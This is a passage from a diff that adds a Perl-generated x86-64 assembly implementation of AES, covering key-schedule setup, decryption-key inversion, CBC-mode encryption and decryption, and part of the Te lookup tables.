+		add	\$1,%ecx
+		lea	16(%rdi),%rdi
+		cmp	\$10,%ecx
+	jl	.L10loop
+
+	movl	\$10,80(%rdi)			# setup number of rounds
+	xor	%rax,%rax
+	jmp	.Lexit
+
+.L12rounds:
+	mov	0(%rsi),%rax			# copy first 6 dwords
+	mov	8(%rsi),%rbx
+	mov	16(%rsi),%rdx
+	mov	%rax,0(%rdi)
+	mov	%rbx,8(%rdi)
+	mov	%rdx,16(%rdi)
+
+	shr	\$32,%rdx
+	xor	%ecx,%ecx
+	jmp	.L12shortcut
+.align	4
+.L12loop:
+		mov	0(%rdi),%eax			# rk[0]
+		mov	20(%rdi),%edx			# rk[5]
+.L12shortcut:
+___
+		&enckey	();
+$code.=<<___;
+		mov	%eax,24(%rdi)			# rk[6]
+		xor	4(%rdi),%eax
+		mov	%eax,28(%rdi)			# rk[7]
+		xor	8(%rdi),%eax
+		mov	%eax,32(%rdi)			# rk[8]
+		xor	12(%rdi),%eax
+		mov	%eax,36(%rdi)			# rk[9]
+
+		cmp	\$7,%ecx
+		je	.L12break
+		add	\$1,%ecx
+
+		xor	16(%rdi),%eax
+		mov	%eax,40(%rdi)			# rk[10]
+		xor	20(%rdi),%eax
+		mov	%eax,44(%rdi)			# rk[11]
+
+		lea	24(%rdi),%rdi
+	jmp	.L12loop
+.L12break:
+	movl	\$12,72(%rdi)		# setup number of rounds
+	xor	%rax,%rax
+	jmp	.Lexit
+
+.L14rounds:		
+	mov	0(%rsi),%rax			# copy first 8 dwords
+	mov	8(%rsi),%rbx
+	mov	16(%rsi),%rcx
+	mov	24(%rsi),%rdx
+	mov	%rax,0(%rdi)
+	mov	%rbx,8(%rdi)
+	mov	%rcx,16(%rdi)
+	mov	%rdx,24(%rdi)
+
+	shr	\$32,%rdx
+	xor	%ecx,%ecx
+	jmp	.L14shortcut
+.align	4
+.L14loop:
+		mov	0(%rdi),%eax			# rk[0]
+		mov	28(%rdi),%edx			# rk[4]
+.L14shortcut:
+___
+		&enckey	();
+$code.=<<___;
+		mov	%eax,32(%rdi)			# rk[8]
+		xor	4(%rdi),%eax
+		mov	%eax,36(%rdi)			# rk[9]
+		xor	8(%rdi),%eax
+		mov	%eax,40(%rdi)			# rk[10]
+		xor	12(%rdi),%eax
+		mov	%eax,44(%rdi)			# rk[11]
+
+		cmp	\$6,%ecx
+		je	.L14break
+		add	\$1,%ecx
+
+		mov	%eax,%edx
+		mov	16(%rdi),%eax			# rk[4]
+		movz	%dl,%esi			# rk[11]>>0
+		movzb	-128(%rbp,%rsi),%ebx
+		movz	%dh,%esi			# rk[11]>>8
+		xor	%ebx,%eax
+
+		movzb	-128(%rbp,%rsi),%ebx
+		shr	\$16,%edx
+		shl	\$8,%ebx
+		movz	%dl,%esi			# rk[11]>>16
+		xor	%ebx,%eax
+
+		movzb	-128(%rbp,%rsi),%ebx
+		movz	%dh,%esi			# rk[11]>>24
+		shl	\$16,%ebx
+		xor	%ebx,%eax
+
+		movzb	-128(%rbp,%rsi),%ebx
+		shl	\$24,%ebx
+		xor	%ebx,%eax
+
+		mov	%eax,48(%rdi)			# rk[12]
+		xor	20(%rdi),%eax
+		mov	%eax,52(%rdi)			# rk[13]
+		xor	24(%rdi),%eax
+		mov	%eax,56(%rdi)			# rk[14]
+		xor	28(%rdi),%eax
+		mov	%eax,60(%rdi)			# rk[15]
+
+		lea	32(%rdi),%rdi
+	jmp	.L14loop
+.L14break:
+	movl	\$14,48(%rdi)		# setup number of rounds
+	xor	%rax,%rax
+	jmp	.Lexit
+
+.Lbadpointer:
+	mov	\$-1,%rax
+.Lexit:
+	.byte	0xf3,0xc3			# rep ret
+.size	_x86_64_AES_set_encrypt_key,.-_x86_64_AES_set_encrypt_key
+___
+
+sub deckey_ref()
+{ my ($i,$ptr,$te,$td) = @_;
+  my ($tp1,$tp2,$tp4,$tp8,$acc)=("%eax","%ebx","%edi","%edx","%r8d");
+$code.=<<___;
+	mov	$i($ptr),$tp1
+	mov	$tp1,$acc
+	and	\$0x80808080,$acc
+	mov	$acc,$tp4
+	shr	\$7,$tp4
+	lea	0($tp1,$tp1),$tp2
+	sub	$tp4,$acc
+	and	\$0xfefefefe,$tp2
+	and	\$0x1b1b1b1b,$acc
+	xor	$tp2,$acc
+	mov	$acc,$tp2
+
+	and	\$0x80808080,$acc
+	mov	$acc,$tp8
+	shr	\$7,$tp8
+	lea	0($tp2,$tp2),$tp4
+	sub	$tp8,$acc
+	and	\$0xfefefefe,$tp4
+	and	\$0x1b1b1b1b,$acc
+	 xor	$tp1,$tp2		# tp2^tp1
+	xor	$tp4,$acc
+	mov	$acc,$tp4
+
+	and	\$0x80808080,$acc
+	mov	$acc,$tp8
+	shr	\$7,$tp8
+	sub	$tp8,$acc
+	lea	0($tp4,$tp4),$tp8
+	 xor	$tp1,$tp4		# tp4^tp1
+	and	\$0xfefefefe,$tp8
+	and	\$0x1b1b1b1b,$acc
+	xor	$acc,$tp8
+
+	xor	$tp8,$tp1		# tp1^tp8
+	rol	\$8,$tp1		# ROTATE(tp1^tp8,8)
+	xor	$tp8,$tp2		# tp2^tp1^tp8
+	xor	$tp8,$tp4		# tp4^tp1^tp8
+	xor	$tp2,$tp8
+	xor	$tp4,$tp8		# tp8^(tp8^tp4^tp1)^(tp8^tp2^tp1)=tp8^tp4^tp2
+
+	xor	$tp8,$tp1
+	rol	\$24,$tp2		# ROTATE(tp2^tp1^tp8,24)
+	xor	$tp2,$tp1
+	rol	\$16,$tp4		# ROTATE(tp4^tp1^tp8,16)
+	xor	$tp4,$tp1
+
+	mov	$tp1,$i($ptr)
+___
+}
+
+# int private_AES_set_decrypt_key(const unsigned char *userKey, const int bits,
+#                        AES_KEY *key)
+$code.=<<___;
+.globl	private_AES_set_decrypt_key
+.type	private_AES_set_decrypt_key,\@function,3
+.align	16
+private_AES_set_decrypt_key:
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	push	%rdx			# save key schedule
+.Ldec_key_prologue:
+
+	call	_x86_64_AES_set_encrypt_key
+	mov	(%rsp),%r8		# restore key schedule
+	cmp	\$0,%eax
+	jne	.Labort
+
+	mov	240(%r8),%r14d		# pull number of rounds
+	xor	%rdi,%rdi
+	lea	(%rdi,%r14d,4),%rcx
+	mov	%r8,%rsi
+	lea	(%r8,%rcx,4),%rdi	# pointer to last chunk
+.align	4
+.Linvert:
+		mov	0(%rsi),%rax
+		mov	8(%rsi),%rbx
+		mov	0(%rdi),%rcx
+		mov	8(%rdi),%rdx
+		mov	%rax,0(%rdi)
+		mov	%rbx,8(%rdi)
+		mov	%rcx,0(%rsi)
+		mov	%rdx,8(%rsi)
+		lea	16(%rsi),%rsi
+		lea	-16(%rdi),%rdi
+		cmp	%rsi,%rdi
+	jne	.Linvert
+
+	lea	.LAES_Te+2048+1024(%rip),%rax	# rcon
+
+	mov	40(%rax),$mask80
+	mov	48(%rax),$maskfe
+	mov	56(%rax),$mask1b
+
+	mov	%r8,$key
+	sub	\$1,%r14d
+.align	4
+.Lpermute:
+		lea	16($key),$key
+		mov	0($key),%rax
+		mov	8($key),%rcx
+___
+		&dectransform ();
+$code.=<<___;
+		mov	%eax,0($key)
+		mov	%ebx,4($key)
+		mov	%ecx,8($key)
+		mov	%edx,12($key)
+		sub	\$1,%r14d
+	jnz	.Lpermute
+
+	xor	%rax,%rax
+.Labort:
+	mov	8(%rsp),%r15
+	mov	16(%rsp),%r14
+	mov	24(%rsp),%r13
+	mov	32(%rsp),%r12
+	mov	40(%rsp),%rbp
+	mov	48(%rsp),%rbx
+	add	\$56,%rsp
+.Ldec_key_epilogue:
+	ret
+.size	private_AES_set_decrypt_key,.-private_AES_set_decrypt_key
+___
+
+# void AES_cbc_encrypt (const void char *inp, unsigned char *out,
+#			size_t length, const AES_KEY *key,
+#			unsigned char *ivp,const int enc);
+{
+# stack frame layout
+# -8(%rsp)		return address
+my $keyp="0(%rsp)";		# one to pass as $key
+my $keyend="8(%rsp)";		# &(keyp->rd_key[4*keyp->rounds])
+my $_rsp="16(%rsp)";		# saved %rsp
+my $_inp="24(%rsp)";		# copy of 1st parameter, inp
+my $_out="32(%rsp)";		# copy of 2nd parameter, out
+my $_len="40(%rsp)";		# copy of 3rd parameter, length
+my $_key="48(%rsp)";		# copy of 4th parameter, key
+my $_ivp="56(%rsp)";		# copy of 5th parameter, ivp
+my $ivec="64(%rsp)";		# ivec[16]
+my $aes_key="80(%rsp)";		# copy of aes_key
+my $mark="80+240(%rsp)";	# copy of aes_key->rounds
+
+$code.=<<___;
+.globl	AES_cbc_encrypt
+.type	AES_cbc_encrypt,\@function,6
+.align	16
+.extern	OPENSSL_ia32cap_P
+.globl	asm_AES_cbc_encrypt
+.hidden	asm_AES_cbc_encrypt
+asm_AES_cbc_encrypt:
+AES_cbc_encrypt:
+	cmp	\$0,%rdx	# check length
+	je	.Lcbc_epilogue
+	pushfq
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+.Lcbc_prologue:
+
+	cld
+	mov	%r9d,%r9d	# clear upper half of enc
+
+	lea	.LAES_Te(%rip),$sbox
+	cmp	\$0,%r9
+	jne	.Lcbc_picked_te
+	lea	.LAES_Td(%rip),$sbox
+.Lcbc_picked_te:
+
+	mov	OPENSSL_ia32cap_P(%rip),%r10d
+	cmp	\$$speed_limit,%rdx
+	jb	.Lcbc_slow_prologue
+	test	\$15,%rdx
+	jnz	.Lcbc_slow_prologue
+	bt	\$28,%r10d
+	jc	.Lcbc_slow_prologue
+
+	# allocate aligned stack frame...
+	lea	-88-248(%rsp),$key
+	and	\$-64,$key
+
+	# ... and make sure it doesn't alias with AES_T[ed] modulo 4096
+	mov	$sbox,%r10
+	lea	2304($sbox),%r11
+	mov	$key,%r12
+	and	\$0xFFF,%r10	# s = $sbox&0xfff
+	and	\$0xFFF,%r11	# e = ($sbox+2048)&0xfff
+	and	\$0xFFF,%r12	# p = %rsp&0xfff
+
+	cmp	%r11,%r12	# if (p=>e) %rsp =- (p-e);
+	jb	.Lcbc_te_break_out
+	sub	%r11,%r12
+	sub	%r12,$key
+	jmp	.Lcbc_te_ok
+.Lcbc_te_break_out:		# else %rsp -= (p-s)&0xfff + framesz
+	sub	%r10,%r12
+	and	\$0xFFF,%r12
+	add	\$320,%r12
+	sub	%r12,$key
+.align	4
+.Lcbc_te_ok:
+
+	xchg	%rsp,$key
+	#add	\$8,%rsp	# reserve for return address!
+	mov	$key,$_rsp	# save %rsp
+.Lcbc_fast_body:
+	mov	%rdi,$_inp	# save copy of inp
+	mov	%rsi,$_out	# save copy of out
+	mov	%rdx,$_len	# save copy of len
+	mov	%rcx,$_key	# save copy of key
+	mov	%r8,$_ivp	# save copy of ivp
+	movl	\$0,$mark	# copy of aes_key->rounds = 0;
+	mov	%r8,%rbp	# rearrange input arguments
+	mov	%r9,%rbx
+	mov	%rsi,$out
+	mov	%rdi,$inp
+	mov	%rcx,$key
+
+	mov	240($key),%eax		# key->rounds
+	# do we copy key schedule to stack?
+	mov	$key,%r10
+	sub	$sbox,%r10
+	and	\$0xfff,%r10
+	cmp	\$2304,%r10
+	jb	.Lcbc_do_ecopy
+	cmp	\$4096-248,%r10
+	jb	.Lcbc_skip_ecopy
+.align	4
+.Lcbc_do_ecopy:
+		mov	$key,%rsi
+		lea	$aes_key,%rdi
+		lea	$aes_key,$key
+		mov	\$240/8,%ecx
+		.long	0x90A548F3	# rep movsq
+		mov	%eax,(%rdi)	# copy aes_key->rounds
+.Lcbc_skip_ecopy:
+	mov	$key,$keyp	# save key pointer
+
+	mov	\$18,%ecx
+.align	4
+.Lcbc_prefetch_te:
+		mov	0($sbox),%r10
+		mov	32($sbox),%r11
+		mov	64($sbox),%r12
+		mov	96($sbox),%r13
+		lea	128($sbox),$sbox
+		sub	\$1,%ecx
+	jnz	.Lcbc_prefetch_te
+	lea	-2304($sbox),$sbox
+
+	cmp	\$0,%rbx
+	je	.LFAST_DECRYPT
+
+#----------------------------- ENCRYPT -----------------------------#
+	mov	0(%rbp),$s0		# load iv
+	mov	4(%rbp),$s1
+	mov	8(%rbp),$s2
+	mov	12(%rbp),$s3
+
+.align	4
+.Lcbc_fast_enc_loop:
+		xor	0($inp),$s0
+		xor	4($inp),$s1
+		xor	8($inp),$s2
+		xor	12($inp),$s3
+		mov	$keyp,$key	# restore key
+		mov	$inp,$_inp	# if ($verticalspin) save inp
+
+		call	_x86_64_AES_encrypt
+
+		mov	$_inp,$inp	# if ($verticalspin) restore inp
+		mov	$_len,%r10
+		mov	$s0,0($out)
+		mov	$s1,4($out)
+		mov	$s2,8($out)
+		mov	$s3,12($out)
+
+		lea	16($inp),$inp
+		lea	16($out),$out
+		sub	\$16,%r10
+		test	\$-16,%r10
+		mov	%r10,$_len
+	jnz	.Lcbc_fast_enc_loop
+	mov	$_ivp,%rbp	# restore ivp
+	mov	$s0,0(%rbp)	# save ivec
+	mov	$s1,4(%rbp)
+	mov	$s2,8(%rbp)
+	mov	$s3,12(%rbp)
+
+	jmp	.Lcbc_fast_cleanup
+
+#----------------------------- DECRYPT -----------------------------#
+.align	16
+.LFAST_DECRYPT:
+	cmp	$inp,$out
+	je	.Lcbc_fast_dec_in_place
+
+	mov	%rbp,$ivec
+.align	4
+.Lcbc_fast_dec_loop:
+		mov	0($inp),$s0	# read input
+		mov	4($inp),$s1
+		mov	8($inp),$s2
+		mov	12($inp),$s3
+		mov	$keyp,$key	# restore key
+		mov	$inp,$_inp	# if ($verticalspin) save inp
+
+		call	_x86_64_AES_decrypt
+
+		mov	$ivec,%rbp	# load ivp
+		mov	$_inp,$inp	# if ($verticalspin) restore inp
+		mov	$_len,%r10	# load len
+		xor	0(%rbp),$s0	# xor iv
+		xor	4(%rbp),$s1
+		xor	8(%rbp),$s2
+		xor	12(%rbp),$s3
+		mov	$inp,%rbp	# current input, next iv
+
+		sub	\$16,%r10
+		mov	%r10,$_len	# update len
+		mov	%rbp,$ivec	# update ivp
+
+		mov	$s0,0($out)	# write output
+		mov	$s1,4($out)
+		mov	$s2,8($out)
+		mov	$s3,12($out)
+
+		lea	16($inp),$inp
+		lea	16($out),$out
+	jnz	.Lcbc_fast_dec_loop
+	mov	$_ivp,%r12		# load user ivp
+	mov	0(%rbp),%r10		# load iv
+	mov	8(%rbp),%r11
+	mov	%r10,0(%r12)		# copy back to user
+	mov	%r11,8(%r12)
+	jmp	.Lcbc_fast_cleanup
+
+.align	16
+.Lcbc_fast_dec_in_place:
+	mov	0(%rbp),%r10		# copy iv to stack
+	mov	8(%rbp),%r11
+	mov	%r10,0+$ivec
+	mov	%r11,8+$ivec
+.align	4
+.Lcbc_fast_dec_in_place_loop:
+		mov	0($inp),$s0	# load input
+		mov	4($inp),$s1
+		mov	8($inp),$s2
+		mov	12($inp),$s3
+		mov	$keyp,$key	# restore key
+		mov	$inp,$_inp	# if ($verticalspin) save inp
+
+		call	_x86_64_AES_decrypt
+
+		mov	$_inp,$inp	# if ($verticalspin) restore inp
+		mov	$_len,%r10
+		xor	0+$ivec,$s0
+		xor	4+$ivec,$s1
+		xor	8+$ivec,$s2
+		xor	12+$ivec,$s3
+
+		mov	0($inp),%r11	# load input
+		mov	8($inp),%r12
+		sub	\$16,%r10
+		jz	.Lcbc_fast_dec_in_place_done
+
+		mov	%r11,0+$ivec	# copy input to iv
+		mov	%r12,8+$ivec
+
+		mov	$s0,0($out)	# save output [zaps input]
+		mov	$s1,4($out)
+		mov	$s2,8($out)
+		mov	$s3,12($out)
+
+		lea	16($inp),$inp
+		lea	16($out),$out
+		mov	%r10,$_len
+	jmp	.Lcbc_fast_dec_in_place_loop
+.Lcbc_fast_dec_in_place_done:
+	mov	$_ivp,%rdi
+	mov	%r11,0(%rdi)	# copy iv back to user
+	mov	%r12,8(%rdi)
+
+	mov	$s0,0($out)	# save output [zaps input]
+	mov	$s1,4($out)
+	mov	$s2,8($out)
+	mov	$s3,12($out)
+
+.align	4
+.Lcbc_fast_cleanup:
+	cmpl	\$0,$mark	# was the key schedule copied?
+	lea	$aes_key,%rdi
+	je	.Lcbc_exit
+		mov	\$240/8,%ecx
+		xor	%rax,%rax
+		.long	0x90AB48F3	# rep stosq
+
+	jmp	.Lcbc_exit
+
+#--------------------------- SLOW ROUTINE ---------------------------#
+.align	16
+.Lcbc_slow_prologue:
+	# allocate aligned stack frame...
+	lea	-88(%rsp),%rbp
+	and	\$-64,%rbp
+	# ... just "above" key schedule
+	lea	-88-63(%rcx),%r10
+	sub	%rbp,%r10
+	neg	%r10
+	and	\$0x3c0,%r10
+	sub	%r10,%rbp
+
+	xchg	%rsp,%rbp
+	#add	\$8,%rsp	# reserve for return address!
+	mov	%rbp,$_rsp	# save %rsp
+.Lcbc_slow_body:
+	#mov	%rdi,$_inp	# save copy of inp
+	#mov	%rsi,$_out	# save copy of out
+	#mov	%rdx,$_len	# save copy of len
+	#mov	%rcx,$_key	# save copy of key
+	mov	%r8,$_ivp	# save copy of ivp
+	mov	%r8,%rbp	# rearrange input arguments
+	mov	%r9,%rbx
+	mov	%rsi,$out
+	mov	%rdi,$inp
+	mov	%rcx,$key
+	mov	%rdx,%r10
+
+	mov	240($key),%eax
+	mov	$key,$keyp	# save key pointer
+	shl	\$4,%eax
+	lea	($key,%rax),%rax
+	mov	%rax,$keyend
+
+	# pick Te4 copy which can't "overlap" with stack frame or key scdedule
+	lea	2048($sbox),$sbox
+	lea	768-8(%rsp),%rax
+	sub	$sbox,%rax
+	and	\$0x300,%rax
+	lea	($sbox,%rax),$sbox
+
+	cmp	\$0,%rbx
+	je	.LSLOW_DECRYPT
+
+#--------------------------- SLOW ENCRYPT ---------------------------#
+	test	\$-16,%r10		# check upon length
+	mov	0(%rbp),$s0		# load iv
+	mov	4(%rbp),$s1
+	mov	8(%rbp),$s2
+	mov	12(%rbp),$s3
+	jz	.Lcbc_slow_enc_tail	# short input...
+
+.align	4
+.Lcbc_slow_enc_loop:
+		xor	0($inp),$s0
+		xor	4($inp),$s1
+		xor	8($inp),$s2
+		xor	12($inp),$s3
+		mov	$keyp,$key	# restore key
+		mov	$inp,$_inp	# save inp
+		mov	$out,$_out	# save out
+		mov	%r10,$_len	# save len
+
+		call	_x86_64_AES_encrypt_compact
+
+		mov	$_inp,$inp	# restore inp
+		mov	$_out,$out	# restore out
+		mov	$_len,%r10	# restore len
+		mov	$s0,0($out)
+		mov	$s1,4($out)
+		mov	$s2,8($out)
+		mov	$s3,12($out)
+
+		lea	16($inp),$inp
+		lea	16($out),$out
+		sub	\$16,%r10
+		test	\$-16,%r10
+	jnz	.Lcbc_slow_enc_loop
+	test	\$15,%r10
+	jnz	.Lcbc_slow_enc_tail
+	mov	$_ivp,%rbp	# restore ivp
+	mov	$s0,0(%rbp)	# save ivec
+	mov	$s1,4(%rbp)
+	mov	$s2,8(%rbp)
+	mov	$s3,12(%rbp)
+
+	jmp	.Lcbc_exit
+
+.align	4
+.Lcbc_slow_enc_tail:
+	mov	%rax,%r11
+	mov	%rcx,%r12
+	mov	%r10,%rcx
+	mov	$inp,%rsi
+	mov	$out,%rdi
+	.long	0x9066A4F3		# rep movsb
+	mov	\$16,%rcx		# zero tail
+	sub	%r10,%rcx
+	xor	%rax,%rax
+	.long	0x9066AAF3		# rep stosb
+	mov	$out,$inp		# this is not a mistake!
+	mov	\$16,%r10		# len=16
+	mov	%r11,%rax
+	mov	%r12,%rcx
+	jmp	.Lcbc_slow_enc_loop	# one more spin...
+#--------------------------- SLOW DECRYPT ---------------------------#
+.align	16
+.LSLOW_DECRYPT:
+	shr	\$3,%rax
+	add	%rax,$sbox		# recall "magic" constants!
+
+	mov	0(%rbp),%r11		# copy iv to stack
+	mov	8(%rbp),%r12
+	mov	%r11,0+$ivec
+	mov	%r12,8+$ivec
+
+.align	4
+.Lcbc_slow_dec_loop:
+		mov	0($inp),$s0	# load input
+		mov	4($inp),$s1
+		mov	8($inp),$s2
+		mov	12($inp),$s3
+		mov	$keyp,$key	# restore key
+		mov	$inp,$_inp	# save inp
+		mov	$out,$_out	# save out
+		mov	%r10,$_len	# save len
+
+		call	_x86_64_AES_decrypt_compact
+
+		mov	$_inp,$inp	# restore inp
+		mov	$_out,$out	# restore out
+		mov	$_len,%r10
+		xor	0+$ivec,$s0
+		xor	4+$ivec,$s1
+		xor	8+$ivec,$s2
+		xor	12+$ivec,$s3
+
+		mov	0($inp),%r11	# load input
+		mov	8($inp),%r12
+		sub	\$16,%r10
+		jc	.Lcbc_slow_dec_partial
+		jz	.Lcbc_slow_dec_done
+
+		mov	%r11,0+$ivec	# copy input to iv
+		mov	%r12,8+$ivec
+
+		mov	$s0,0($out)	# save output [can zap input]
+		mov	$s1,4($out)
+		mov	$s2,8($out)
+		mov	$s3,12($out)
+
+		lea	16($inp),$inp
+		lea	16($out),$out
+	jmp	.Lcbc_slow_dec_loop
+.Lcbc_slow_dec_done:
+	mov	$_ivp,%rdi
+	mov	%r11,0(%rdi)		# copy iv back to user
+	mov	%r12,8(%rdi)
+
+	mov	$s0,0($out)		# save output [can zap input]
+	mov	$s1,4($out)
+	mov	$s2,8($out)
+	mov	$s3,12($out)
+
+	jmp	.Lcbc_exit
+
+.align	4
+.Lcbc_slow_dec_partial:
+	mov	$_ivp,%rdi
+	mov	%r11,0(%rdi)		# copy iv back to user
+	mov	%r12,8(%rdi)
+
+	mov	$s0,0+$ivec		# save output to stack
+	mov	$s1,4+$ivec
+	mov	$s2,8+$ivec
+	mov	$s3,12+$ivec
+
+	mov	$out,%rdi
+	lea	$ivec,%rsi
+	lea	16(%r10),%rcx
+	.long	0x9066A4F3	# rep movsb
+	jmp	.Lcbc_exit
+
+.align	16
+.Lcbc_exit:
+	mov	$_rsp,%rsi
+	mov	(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lcbc_popfq:
+	popfq
+.Lcbc_epilogue:
+	ret
+.size	AES_cbc_encrypt,.-AES_cbc_encrypt
+___
+}
+
+$code.=<<___;
+.align	64
+.LAES_Te:
+___
+	&_data_word(0xa56363c6, 0x847c7cf8, 0x997777ee, 0x8d7b7bf6);
+	&_data_word(0x0df2f2ff, 0xbd6b6bd6, 0xb16f6fde, 0x54c5c591);
+	&_data_word(0x50303060, 0x03010102, 0xa96767ce, 0x7d2b2b56);
+	&_data_word(0x19fefee7, 0x62d7d7b5, 0xe6abab4d, 0x9a7676ec);
+	&_data_word(0x45caca8f, 0x9d82821f, 0x40c9c989, 0x877d7dfa);
+	&_data_word(0x15fafaef, 0xeb5959b2, 0xc947478e, 0x0bf0f0fb);
+	&_data_word(0xecadad41, 0x67d4d4b3, 0xfda2a25f, 0xeaafaf45);
+	&_data_word(0xbf9c9c23, 0xf7a4a453, 0x967272e4, 0x5bc0c09b);
+	&_data_word(0xc2b7b775, 0x1cfdfde1, 0xae93933d, 0x6a26264c);
+	&_data_word(0x5a36366c, 0x413f3f7e, 0x02f7f7f5, 0x4fcccc83);
+	&_data_word(0x5c343468, 0xf4a5a551, 0x34e5e5d1, 0x08f1f1f9);
+	&_data_word(0x937171e2, 0x73d8d8ab, 0x53313162, 0x3f15152a);
+	&_data_word(0x0c040408, 0x52c7c795, 0x65232346, 0x5ec3c39d);
+	&_data_word(0x28181830, 0xa1969637, 0x0f05050a, 0xb59a9a2f);
+	&_data_word(0x0907070e, 0x36121224, 0x9b80801b, 0x3de2e2df);
+	&_data_word(0x26ebebcd, 0x6927274e, 0xcdb2b27f, 0x9f7575ea);
+	&_data_word(0x1b090912, 0x9e83831d, 0x742c2c58, 0x2e1a1a34);
+	&_data_word(0x2d1b1b36, 0xb26e6edc, 0xee5a5ab4, 0xfba0a05b);
+	&_data_word(0xf65252a4, 0x4d3b3b76, 0x61d6d6b7, 0xceb3b37d);
+	&_data_word(0x7b292952, 0x3ee3e3dd, 0x712f2f5e, 0x97848413);
+	&_data_word(0xf55353a6, 0x68d1d1b9, 0x00000000, 0x2cededc1);
+	&_data_word(0x60202040, 0x1ffcfce3, 0xc8b1b179, 0xed5b5bb6);
+	&_data_word(0xbe6a6ad4, 0x46cbcb8d, 0xd9bebe67, 0x4b393972);
+	&_data_word(0xde4a4a94, 0xd44c4c98, 0xe85858b0, 0x4acfcf85);
+	&_data_word(0x6bd0d0bb, 0x2aefefc5, 0xe5aaaa4f, 0x16fbfbed);
+	&_data_word(0xc5434386, 0xd74d4d9a, 0x55333366, 0x94858511);
+	&_data_word(0xcf45458a, 0x10f9f9e9, 0x06020204, 0x817f7ffe);
+	&_data_word(0xf05050a0, 0x443c3c78, 0xba9f9f25, 0xe3a8a84b);
+	&_data_word(0xf35151a2, 0xfea3a35d, 0xc0404080, 0x8a8f8f05);
+	&_data_word(0xad92923f, 0xbc9d9d21, 0x48383870, 0x04f5f5f1);
+	&_data_word(0xdfbcbc63, 0xc1b6b677, 0x75dadaaf, 0x63212142);
+	&_data_word(0x30101020, 0x1affffe5, 0x0ef3f3fd, 0x6dd2d2bf);
+	&_data_word(0x4ccdcd81, 0x140c0c18, 0x35131326, 0x2fececc3);
+	&_data_word(0xe15f5fbe, 0xa2979735, 0xcc444488, 0x3917172e);
+	&_data_word(0x57c4c493, 0xf2a7a755, 0x827e7efc, 0x473d3d7a);
+	&_data_word(0xac6464c8, 0xe75d5dba, 0x2b191932, 0x957373e6);
+	&_data_word(0xa06060c0, 0x98818119, 0xd14f4f9e, 0x7fdcdca3);
+	&_data_word(0x66222244, 0x7e2a2a54, 0xab90903b, 0x8388880b);
+	&_data_word(0xca46468c, 0x29eeeec7, 0xd3b8b86b, 0x3c141428);
+	&_data_word(0x79dedea7, 0xe25e5ebc, 0x1d0b0b16, 0x76dbdbad);
+	&_data_word(0x3be0e0db, 0x56323264, 0x4e3a3a74, 0x1e0a0a14);
+	&_data_word(0xdb494992, 0x0a06060c, 0x6c242448, 0xe45c5cb8);
+	&_data_word(0x5dc2c29f, 0x6ed3d3bd, 0xefacac43, 0xa66262c4);
+	&_data_word(0xa8919139, 0xa4959531, 0x37e4e4d3, 0x8b7979f2);
+	&_data_word(0x32e7e7d5, 0x43c8c88b, 0x5937376e, 0xb76d6dda);
+	&_data_word(0x8c8d8d01, 0x64d5d5b1, 0xd24e4e9c, 0xe0a9a949);
+	&_data_word(0xb46c6cd8, 0xfa5656ac, 0x07f4f4f3, 0x25eaeacf);
+	&_data_word(0xaf6565ca, 0x8e7a7af4, 0xe9aeae47, 0x18080810);
+	&_data_word(0xd5baba6f, 0x887878f0, 0x6f25254a, 0x722e2e5c);
+	&_data_word(0x241c1c38, 0xf1a6a657, 0xc7b4b473, 0x51c6c697);
+	&_data_word(0x23e8e8cb, 0x7cdddda1, 0x9c7474e8, 0x211f1f3e);
+	&_data_word(0xdd4b4b96, 0xdcbdbd61, 0x868b8b0d, 0x858a8a0f);
+	&_data_word(0x907070e0, 0x423e3e7c, 0xc4b5b571, 0xaa6666cc);
+	&_data_word(0xd8484890, 0x05030306, 0x01f6f6f7, 0x120e0e1c);
+	&_data_word(0xa36161c2, 0x5f35356a, 0xf95757ae, 0xd0b9b969);
+	&_data_word(0x91868617, 0x58c1c199, 0x271d1d3a, 0xb99e9e27);
+	&_data_word(0x38e1e1d9, 0x13f8f8eb, 0xb398982b, 0x33111122);
+	&_data_word(0xbb6969d2, 0x70d9d9a9, 0x898e8e07, 0xa7949433);
+	&_data_word(0xb69b9b2d, 0x221e1e3c, 0x92878715, 0x20e9e9c9);
+	&_data_word(0x49cece87, 0xff5555aa, 0x78282850, 0x7adfdfa5);
+	&_data_word(0x8f8c8c03, 0xf8a1a159, 0x80898909, 0x170d0d1a);
+	&_data_word(0xdabfbf65, 0x31e6e6d7, 0xc6424284, 0xb86868d0);
+	&_data_word(0xc3414182, 0xb0999929, 0x772d2d5a, 0x110f0f1e);
+	&_data_word(0xcbb0b07b, 0xfc5454a8, 0xd6bbbb6d, 0x3a16162c);
+
+#Te4	# four copies of Te4 to choose from to avoid L1 aliasing
+	&data_byte(0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5);
+	&data_byte(0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76);
+	&data_byte(0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0);
+	&data_byte(0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0);
+	&data_byte(0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc);
+	&data_byte(0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15);
+	&data_byte(0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a);
+	&data_byte(0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75);
+	&data_byte(0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0);
+	&data_byte(0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84);
+	&data_byte(0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b);
+	&data_byte(0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf);
+	&data_byte(0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85);
+	&data_byte(0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8);
+	&data_byte(0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5);
